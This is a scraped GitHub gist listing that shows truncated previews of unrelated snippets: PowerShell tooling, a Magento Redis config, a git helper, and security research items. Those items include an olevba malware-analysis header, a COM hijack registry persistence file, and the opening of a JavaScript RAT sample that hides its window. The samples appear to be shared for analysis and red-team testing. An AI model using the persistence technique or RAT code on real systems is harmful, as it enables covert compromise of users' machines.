Skip to content

Instantly share code, notes, and snippets.

View unbaiat's full-sized avatar

unbaiat unbaiat

  • Unicorns United Ltd
  • Castalia
View GitHub Profile
@ricardojba
ricardojba / windows_hardening.cmd
Last active June 3, 2025 15:01
A Windows hardening script
::##########################################################################################################################
::
:: This script can ruin your day, if you run it without fully understanding what it does, you don't know what you are doing,
::
:: OR BOTH!!!
::
:: YOU HAVE BEEN WARNED!!!!!!!!!!
::
:: This script is provided "AS IS" with no warranties, and confers no rights.
:: Feel free to challenge me, disagree with me, or tell me I'm completely nuts in the comments section,
# Author: Matt Graeber, SpecterOps
ls C:\* -Recurse -Include '*.exe', '*.dll' -ErrorAction SilentlyContinue | % {
try {
$Assembly = [Reflection.Assembly]::ReflectionOnlyLoadFrom($_.FullName)
if ($Assembly.GetReferencedAssemblies().Name -contains 'System.Management.Automation') {
$_.FullName
}
} catch {}
}
# This idea originated from this blog post on Invoke DSC Resources directly:
# https://blogs.msdn.microsoft.com/powershell/2015/02/27/invoking-powershell-dsc-resources-directly/
<#
$MOFContents = @'
instance of MSFT_ScriptResource as $MSFT_ScriptResource1ref
{
ResourceID = "[Script]ScriptExample";
GetScript = "\"$(Get-Date): I am being GET\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
TestScript = "\"$(Get-Date): I am being TESTED\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
@dvershinin
dvershinin / cache.xml
Last active January 16, 2021 23:07
Magento Redis Configuration
<?xml version="1.0"?>
<config>
<global>
<cache>
<backend>Mage_Cache_Backend_Redis</backend>
<backend_options>
<server>/var/run/redis/redis.sock</server> <!-- or absolute path to unix socket -->
<persistent></persistent> <!-- Specify a unique string like "cache-db0" to enable persistent connections. -->
<database>2</database>
<password></password>
## uploaded by @JohnLaTwC
## Sample hash: 8ec12b0d45c71d87fd78cd69ff01d925f7729621f4172d2326cc238730c8d531
olevba 0.52dev7 - http://decalage.info/python/oletools
Flags Filename
----------- -----------------------------------------------------------------
OLE:MASI---- 8ec12b0d45c71d87fd78cd69ff01d925f7729621f4172d2326cc238730c8d531
===============================================================================
FILE: 8ec12b0d45c71d87fd78cd69ff01d925f7729621f4172d2326cc238730c8d531
Type: OLE
-------------------------------------------------------------------------------
anonymous
anonymous / winlogon.reg
Created February 11, 2018 19:10
WinLogon Windows 7 x64 COM Hijack
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00]
@="AtomicRedTeam"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00\CLSID]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam]
@="AtomicRedTeam"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam\CLSID]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]
@JohnLaTwC
JohnLaTwC / JavaScript RAT
Created February 9, 2018 17:05
JavaScript RAT
## uploaded by @JohnLaTwC
## sample hash: 1d37e2a657ccc595c7a5544df6fd2d35739455f3fdbc2d2700835873130befde
<html>
<head>
<script language="JScript">
window.resizeTo(1, 1);
window.moveTo(-2000, -2000);
window.blur();
try
@latsku
latsku / powershell-tcp-server.ps1
Last active January 25, 2024 09:10
Powershell TCP server
$endpoint = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::any, 1600)
$Listener = New-Object System.Net.Sockets.TcpListener $endpoint
$Listener.Start()
$client = $Listener.AcceptTcpClient()
$stream = $client.GetStream()
$stream.Write([text.Encoding]::Ascii.GetBytes("Hello Telnet World"), 0, 18)
@jobertabma
jobertabma / git-inspect.sh
Last active March 13, 2018 23:26
A script to manually iterate over git commits. Use qj/qk to navigate.
DIFF_NUMBER=1
while read -n1 -r -p "$DIFF_NUMBER:" && [[ $REPLY != q ]]; do
case $REPLY in
j)
DIFF_NUMBER=`expr $DIFF_NUMBER + 1`
;;
k)
DIFF_NUMBER=`expr $DIFF_NUMBER - 1`
;;
@nohwnd
nohwnd / poopcompiler.ps1
Created December 6, 2017 15:20
emojicode in PowerShell
function 🐙 {
$name,$params = $args.Where({$_ -eq '💩'},'Until')
$null,$groups = $args.Where({$_ -eq '💩'},'SkipUntil')
$params = @($params |? {$_})
$bodyText = $groups | %{
$enumerator = [System.Globalization.StringInfo]::GetTextElementEnumerator($_)
$letters = while ($enumerator.MoveNext())